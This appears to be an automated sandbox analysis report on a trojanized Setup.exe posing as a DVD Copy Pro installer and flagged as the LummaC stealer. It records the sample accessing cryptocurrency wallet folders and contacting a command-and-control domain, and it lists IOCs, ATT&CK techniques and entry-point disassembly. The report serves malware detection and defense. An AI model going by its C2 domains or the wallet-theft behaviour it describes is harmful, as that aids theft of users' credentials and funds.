                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                  Source: Yara matchFile source: 00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7128, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7128, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Virtualization/Sandbox Evasion
                  2
                  OS Credential Dumping
                  121
                  Security Software Discovery
                  Remote Services1
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter
                  Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
                  Deobfuscate/Decode Files or Information
                  LSASS Memory11
                  Virtualization/Sandbox Evasion
                  Remote Desktop Protocol41
                  Data from Local System
                  2
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell
                  Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  Security Account Manager2
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive113
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading
                  NTDS1
                  File and Directory Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
                  System Information Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Setup.exe11%ReversingLabsWin32.Exploit.LummaC
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://simplerapplau.click/0%Avira URL Cloudsafe
                  https://simplerapplau.click/apil0%Avira URL Cloudsafe
                  https://simplerapplau.click/CY/0%Avira URL Cloudsafe
                  https://simplerapplau.click/ur0%Avira URL Cloudsafe
                  https://simplerapplau.click:443/apiefault-release/key4.dbPK0%Avira URL Cloudsafe
                  https://simplerapplau.click/(w0%Avira URL Cloudsafe
                  https://simplerapplau.click/apicg0%Avira URL Cloudsafe
                  https://simplerapplau.click/apia0%Avira URL Cloudsafe
                  https://simplerapplau.click/otCW.0%Avira URL Cloudsafe
                  https://simplerapplau.cl0%Avira URL Cloudsafe
                  https://simplerapplau.click/apiiipp0%Avira URL Cloudsafe
                  https://simplerapplau.click/apihdmo0%Avira URL Cloudsafe
                  simplerapplau.click0%Avira URL Cloudsafe
                  https://simplerapplau.click/apiv0%Avira URL Cloudsafe
                  https://simplerapplau.click:443/api0%Avira URL Cloudsafe
                  https://simplerapplau.click/pi0%Avira URL Cloudsafe
                  https://simplerapplau.click/api0%Avira URL Cloudsafe
                  https://simplerapplau.click/f-cach0%Avira URL Cloudsafe
                  https://simplerapplau.click/api(0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  simplerapplau.click
                  104.21.88.199
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    necklacebudi.latfalse
                      high
                      aspecteirs.latfalse
                        high
                        sustainskelet.latfalse
                          high
                          crosshuaht.latfalse
                            high
                            rapeflowwj.latfalse
                              high
                              https://simplerapplau.click/apitrue
                              • Avira URL Cloud: safe
                              unknown
                              simplerapplau.clicktrue
                              • Avira URL Cloud: safe
                              unknown
                              energyaffai.latfalse
                                high
                                grannyejh.latfalse
                                  high
                                  discokeyus.latfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabSetup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://simplerapplau.click/Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001172000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://simplerapplau.click/urSetup.exe, 00000000.00000003.1703033346.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001172000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/ac/?q=Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.iniSetup.exefalse
                                          high
                                          http://ocsp.sectigo.com0Setup.exefalse
                                            high
                                            https://simplerapplau.click:443/apiefault-release/key4.dbPKSetup.exe, 00000000.00000003.1888928350.000000000110E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891400964.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.winxdvd.com/specialoffer/latest_giveaway_addBuySetup.exefalse
                                                high
                                                https://simplerapplau.click/otCW.Setup.exe, 00000000.00000003.1703033346.0000000001172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://simplerapplau.click/apicgSetup.exe, 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.winxdvd.com/Setup.exefalse
                                                  high
                                                  https://simplerapplau.click/CY/Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcp_beginbeuiafterafuiopenUsing_Trial_CopyThisSetup.exefalse
                                                    high
                                                    http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcpregisteropenRegistered_SuccessfullyRegisteredSetup.exefalse
                                                      high
                                                      http://www.winxdvd.com/dvd-copy-pro/free-update.htm?chlic13openSetup.exefalse
                                                        high
                                                        http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://simplerapplau.click/apilSetup.exe, 00000000.00000003.1826294302.00000000011AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.winxdvd.com/specialoffer/old_giveaway_addBuySetup.exefalse
                                                                high
                                                                https://simplerapplau.click/(wSetup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.iniupgrade.iniD=Setup.exefalse
                                                                  high
                                                                  https://simplerapplau.clSetup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://simplerapplau.click/apiaSetup.exe, 00000000.00000003.1888928350.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892255892.00000000011AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.winxdvd.com/dvd-copy-pro/registered-update.htmlatest_reg_addEnjoySetup.exefalse
                                                                      high
                                                                      http://www.winxdvd.com/dvd-copy-pro/buy.htmlatest_unreg_addBuySetup.exefalse
                                                                        high
                                                                        http://www.winxdvd.com/dvd-copy-pro/faq.htm1http://www.winxdvd.com/dvd-copy-pro/updatelog.htm9http:/Setup.exefalse
                                                                          high
                                                                          https://sectigo.com/CPS0Setup.exefalse
                                                                            high
                                                                            https://www.winxdvd.com/Setup.exefalse
                                                                              high
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.winxdvd.com/dvd-copy-pro/registered-update.htmTheSetup.exefalse
                                                                                  high
                                                                                  https://simplerapplau.click/apiiippSetup.exe, 00000000.00000002.1892093250.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://simplerapplau.click/apihdmoSetup.exe, 00000000.00000003.1826294302.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892093250.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.winxdvd.com/dvd-copy-pro/registered-update.htmold_reg_addUpdateSetup.exefalse
                                                                                    high
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.winxdvd.comSetup.exefalse
                                                                                            high
                                                                                            https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://simplerapplau.click/apivSetup.exe, 00000000.00000003.1888928350.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892255892.00000000011AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.winxdvd.com/dvd-copy-pro/registered-update.htmSetup.exefalse
                                                                                                  high
                                                                                                  https://simplerapplau.click/piSetup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.winxdvd.com/Help_Filehelp.chm.chmhelpopenInit_CDROMCD-ROMSetup.exefalse
                                                                                                    high
                                                                                                    https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tSetup.exefalse
                                                                                                        high
                                                                                                        https://simplerapplau.click/api(Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Setup.exefalse
                                                                                                          high
                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.winxdvd.com/dvd-copy-pro/free-update.htmSetup.exefalse
                                                                                                              high
                                                                                                              http://www.winxdvd.com/dvd-copy-pro/buy.htmold_unreg_addBuySetup.exefalse
                                                                                                                high
                                                                                                                https://simplerapplau.click:443/apiSetup.exe, 00000000.00000003.1764468215.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.winxdvd.com/dvd-copy-pro/download.htm7http://www.winxdvd.com/help/how-to-use-dvd-copy-proSetup.exefalse
                                                                                                                    high
                                                                                                                    https://simplerapplau.click/f-cachSetup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://crl.microsSetup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890224482.0000000001175000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      104.21.88.199
                                                                                                                      simplerapplau.clickUnited States
                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1577781
                                                                                                                      Start date and time:2024-12-18 18:28:15 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 5m 14s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:7
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:Setup.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 6
                                                                                                                      • Number of non-executed functions: 112
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: Setup.exe
                                                                                                                      TimeTypeDescription
                                                                                                                      13:45:53API Interceptor8x Sleep call for process: Setup.exe modified
                                                                                                                      No context
                                                                                                                      No context
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      CLOUDFLARENETUShttp://files.playanext.com/v8/avast_secure_browser_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.15.96
                                                                                                                      https://docs.zoom.us/doc/amQMYMv8RzCj0FS5-u7_7w?from=emailGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.18.86.42
                                                                                                                      http://johnlewisfinance.qa.uinsure.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      securedoc_20241217T163143.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.18.11.207
                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                                      • 104.21.23.76
                                                                                                                      https://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.21.56.29
                                                                                                                      https://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 172.67.134.110
                                                                                                                      _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 172.65.255.143
                                                                                                                      https://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.26.8.129
                                                                                                                      https://www.grapevine.org/join/next-gen-giving-circle-dcGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.16.117.116
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      iOnDpwrkWY.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      Z1jUFmrTua.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      qth5kdee.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.88.199
                                                                                                                      No context
                                                                                                                      No created / dropped files found
                                                                                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                      Entropy (8bit):6.723780465993401
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.99%
                                                                                                                      • InstallShield setup (43055/19) 0.43%
                                                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      File name:Setup.exe
                                                                                                                      File size:10'190'992 bytes
                                                                                                                      MD5:8af6db9955abed6390bc281e0430ddc3
                                                                                                                      SHA1:fce22724af26d5242f04697c893166051d1dc797
                                                                                                                      SHA256:150f955296353908a81bb4dca5c4a5b7563a057d5ed63f56831bee5234010e1c
                                                                                                                      SHA512:8b5eba511893bd94b58e9494c264c581119e60900319b30b65c9743d322a732dc8f3dc4150431f84cd48d43f49aa5f187db5bee7ad8589d39369deeb6d9f96d1
                                                                                                                      SSDEEP:98304:Rs3cmFA3kB7mHCGawTSEZUbWk/r3TqLjHT+da+FOwsMgJJTnQGGGGNlGGGSZGGGv:RccmpwybWCDTqnHT+zCvGBPC
                                                                                                                      TLSH:BEA67C23F761C066F05709B0AA6B66B2AC346F74EA95004BB7A0BE0DB6F31D1516F707
                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                      Icon Hash:bc0f370b1b0d4d43
                                                                                                                      Entrypoint:0x401e58
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x64D6E803 [Sat Aug 12 02:01:39 2023 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:87254b6d506b71e6cf1f7cb33288bee2
                                                                                                                      Signature Valid:false
                                                                                                                      Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                      Error Number:-2146869232
                                                                                                                      Not Before, Not After
                                                                                                                      • 18/05/2021 20:00:00 22/05/2024 19:59:59
                                                                                                                      Subject Chain
                                                                                                                      • CN="Digiarty Software, Inc.", O="Digiarty Software, Inc.", L=Chengdu, S=Sichuan, C=CN
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:E52449B6FB0D71581A2377613347EF76
                                                                                                                      Thumbprint SHA-1:E122C1337C0DCAE9D48B776CCFD12A70C33F9CE8
                                                                                                                      Thumbprint SHA-256:7E00A55AC7216D474B66FE6DBE66A7014631BA5693B10E5A829EA3CE59A77DAC
                                                                                                                      Serial:01F30A8BB86816538B43BF89D74D9F48
                                                                                                                      Instruction
                                                                                                                      jmp 00007F75FD12F4A2h
                                                                                                                      bound di, dword ptr [edx]
                                                                                                                      inc ebx
                                                                                                                      sub ebp, dword ptr [ebx]
                                                                                                                      dec eax
                                                                                                                      dec edi
                                                                                                                      dec edi
                                                                                                                      dec ebx
                                                                                                                      nop
                                                                                                                      jmp 00007F75FDA58541h
                                                                                                                      mov eax, dword ptr [0092909Fh]
                                                                                                                      shl eax, 02h
                                                                                                                      mov dword ptr [009290A3h], eax
                                                                                                                      push edx
                                                                                                                      push 00000000h
                                                                                                                      call 00007F75FD65496Ch
                                                                                                                      mov edx, eax
                                                                                                                      call 00007F75FD43DE07h
                                                                                                                      pop edx
                                                                                                                      call 00007F75FD43DA01h
                                                                                                                      call 00007F75FD43E318h
                                                                                                                      push 00000000h
                                                                                                                      call 00007F75FD43F8F9h
                                                                                                                      pop ecx
                                                                                                                      push 00929048h
                                                                                                                      push 00000000h
                                                                                                                      call 00007F75FD654946h
                                                                                                                      mov dword ptr [009290A7h], eax
                                                                                                                      push 00000000h
                                                                                                                      jmp 00007F75FD44ACA0h
                                                                                                                      jmp 00007F75FD43F92Bh
                                                                                                                      xor eax, eax
                                                                                                                      mov al, byte ptr [00929091h]
                                                                                                                      ret
                                                                                                                      mov eax, dword ptr [009290A7h]
                                                                                                                      ret
                                                                                                                      pushad
                                                                                                                      mov ebx, BCB05000h
                                                                                                                      push ebx
                                                                                                                      push 00000BADh
                                                                                                                      ret
                                                                                                                      mov ecx, 000000ECh
                                                                                                                      or ecx, ecx
                                                                                                                      je 00007F75FD12F4DFh
                                                                                                                      cmp dword ptr [0092909Fh], 00000000h
                                                                                                                      jnc 00007F75FD12F49Ch
                                                                                                                      mov eax, 000000FEh
                                                                                                                      call 00007F75FD12F46Ch
                                                                                                                      mov ecx, 000000ECh
                                                                                                                      push ecx
                                                                                                                      push 00000008h
                                                                                                                      call 00007F75FD654909h
                                                                                                                      push eax
                                                                                                                      call 00007F75FD6549B1h
                                                                                                                      or eax, eax
                                                                                                                      jne 00007F75FD12F49Ch
